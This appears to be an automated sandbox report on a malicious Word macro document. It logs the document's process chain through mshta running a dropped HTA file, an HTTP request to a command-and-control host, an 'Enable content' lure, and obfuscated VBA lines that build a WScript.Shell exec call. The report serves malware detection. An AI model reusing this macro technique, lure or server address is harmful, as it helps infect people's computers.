Source: enjoin,12.27.2021.doc |
ReversingLabs: Detection: 44% |
Source: enjoin,12.27.2021.doc |
Joe Sandbox ML: detected |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process created: C:\Windows\explorer.exe |
Source: global traffic |
HTTP traffic detected: GET /frhe/L8dclCye7SQ5WTFva78FDxOjGBOF9iJro4DRgV/5inYIaSBt0KLfMB9kXwZBv6ZpTsny6/qAhIQjrAaLKJeTLQnbCarASpMADNe9u19Kylnkoreo7/SjqMh4eEx0Hx9b4h5e2fMcQgeIbFT/kKeSzfUaenwSFB/ISkVIHedx0p/49280/SruwcI68Yb5pVaVqfvyOHztDsbEuhGxtlV6bpgPIFvGFQ277/7FkN9pAcaWDfFlGNBeuaqGed8iDibaWexT/GyAAzLRbFAU1XErrU1F/vaci3?page=V8BBaQuem65&page=XYvyd0Dcrg6fJYLGHRVWp7s1tv&page=dvZwXcjcYCjBX8tPaALshiDAx85PEq&sid=10tOgWzOZj9xyAidNJAz3d9Ob0 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: patelboostg.comConnection: Keep-Alive |
Source: mshta.exe, 00000004.00000002.419910763.0000000006CAA000.00000004.00000001.sdmp |
String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin) |
Source: mshta.exe, 00000004.00000002.417663387.0000000003B50000.00000002.00020000.sdmp |
String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail) |
Source: mshta.exe, 00000004.00000002.419910763.0000000006CAA000.00000004.00000001.sdmp |
String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin) |
Source: mshta.exe, 00000004.00000002.417663387.0000000003B50000.00000002.00020000.sdmp |
String found in binary or memory: http://investor.msn.com |
Source: mshta.exe, 00000004.00000002.417663387.0000000003B50000.00000002.00020000.sdmp |
String found in binary or memory: http://investor.msn.com/ |
Source: mshta.exe, 00000004.00000002.417946104.0000000003D37000.00000002.00020000.sdmp |
String found in binary or memory: http://localizability/practices/XML.asp |
Source: mshta.exe, 00000004.00000002.417946104.0000000003D37000.00000002.00020000.sdmp |
String found in binary or memory: http://localizability/practices/XMLConfiguration.asp |
Source: mshta.exe, 00000004.00000003.416145153.000000000050F000.00000004.00000001.sdmp, mshta.exe, 00000004.00000002.417236396.00000000004EC000.00000004.00000001.sdmp, mshta.exe, 00000004.00000002.417153403.0000000000444000.00000004.00000020.sdmp, mshta.exe, 00000004.00000002.419957947.0000000006CBD000.00000004.00000001.sdmp, mshta.exe, 00000004.00000003.416821564.00000000004A0000.00000004.00000001.sdmp, mshta.exe, 00000004.00000003.416902937.00000000004A3000.00000004.00000001.sdmp, mshta.exe, 00000004.00000003.416884776.0000000006CBD000.00000004.00000001.sdmp, mshta.exe, 00000004.00000003.415996164.00000000004A0000.00000004.00000001.sdmp |
String found in binary or memory: http://patelboostg.com/frhe/L8dclCye7SQ5WTFva78FDxOjGBOF9iJro4DRgV/5inYIaSBt0KLfMB9kXwZBv6ZpTsny6/qA |
Source: explorer.exe, 00000002.00000002.407152025.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000003.00000002.407524765.0000000001D80000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.418206681.0000000003F30000.00000002.00020000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. |
Source: mshta.exe, 00000004.00000002.417946104.0000000003D37000.00000002.00020000.sdmp |
String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check |
Source: mshta.exe, 00000004.00000002.417946104.0000000003D37000.00000002.00020000.sdmp |
String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true |
Source: explorer.exe, 00000002.00000002.407152025.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000003.00000002.407524765.0000000001D80000.00000002.00020000.sdmp, mshta.exe, 00000004.00000002.418206681.0000000003F30000.00000002.00020000.sdmp |
String found in binary or memory: http://www.%s.comPA |
Source: mshta.exe, 00000004.00000002.417663387.0000000003B50000.00000002.00020000.sdmp |
String found in binary or memory: http://www.hotmail.com/oe |
Source: mshta.exe, 00000004.00000002.417946104.0000000003D37000.00000002.00020000.sdmp |
String found in binary or memory: http://www.icra.org/vocabulary/. |
Source: mshta.exe, 00000004.00000002.417663387.0000000003B50000.00000002.00020000.sdmp |
String found in binary or memory: http://www.msnbc.com/news/ticker.txt |
Source: mshta.exe, 00000004.00000002.417663387.0000000003B50000.00000002.00020000.sdmp |
String found in binary or memory: http://www.windows.com/pctv. |
Source: Screenshot number: 4 |
Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content" O Page: 1 of 1, Words: 118 |
Source: enjoin,12.27.2021.doc |
OLE, VBA macro line: CreateObject("wsc" + cont1("company") + "ell").exec cont1("category") + " " + mouseVideo |
|
Source: enjoin,12.27.2021.doc |
OLE, VBA macro line: Sub Document_Open() |
|
Source: enjoin,12.27.2021.doc |
OLE indicator, VBA macros: true |
Source: enjoin,12.27.2021.doc |
OLE, VBA macro line: cont1 = activedocument.builtindocumentproperties(i7computermonitor).value |
Source: unknown |
Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding |
|
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process created: C:\Windows\explorer.exe explorer i7Gigabyte.hta |
|
Source: unknown |
Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding |
|
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\i7Gigabyte.hta" |
|
Source: enjoin,12.27.2021.doc |
OLE indicator, Word Document stream: true |
Source: classification engine |
Classification label: mal72.expl.winDOC@6/13@1/1 |
Source: mshta.exe, 00000004.00000002.417663387.0000000003B50000.00000002.00020000.sdmp |
Binary or memory string: .VBPud<_ |
Source: enjoin,12.27.2021.doc |
OLE document summary: title field not present or empty |
Source: enjoin,12.27.2021.doc |
OLE document summary: author field not present or empty |
Source: enjoin,12.27.2021.doc |
OLE document summary: edited time not present or 0 |
Source: unknown |
Process created: C:\Windows\explorer.exe |
|
Source: enjoin,12.27.2021.doc |
Initial sample: OLE summary comments = ta |
Source: enjoin,12.27.2021.doc |
Initial sample: OLE document summary bytes = 26624 |
Source: enjoin,12.27.2021.doc |
Initial sample: OLE document summary category = explorer |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\explorer.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Source: enjoin,12.27.2021.doc |
Stream path 'Data' entropy: 7.93699752134 (max. 8.0) |
Source: C:\Windows\explorer.exe TID: 3000 |
Thread sleep time: -60000s >= -30000s |
Source: C:\Windows\explorer.exe TID: 2924 |
Thread sleep time: -60000s >= -30000s |
Source: C:\Windows\SysWOW64\mshta.exe TID: 2816 |
Thread sleep time: -300000s >= -30000s |
Source: explorer.exe, 00000003.00000003.406744382.000000000035E000.00000004.00000001.sdmp |
Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}] |
Source: C:\Windows\explorer.exe |
Directory queried: C:\Users\user\Documents |
Source: C:\Windows\SysWOW64\mshta.exe |
Directory queried: C:\Users\user\Documents |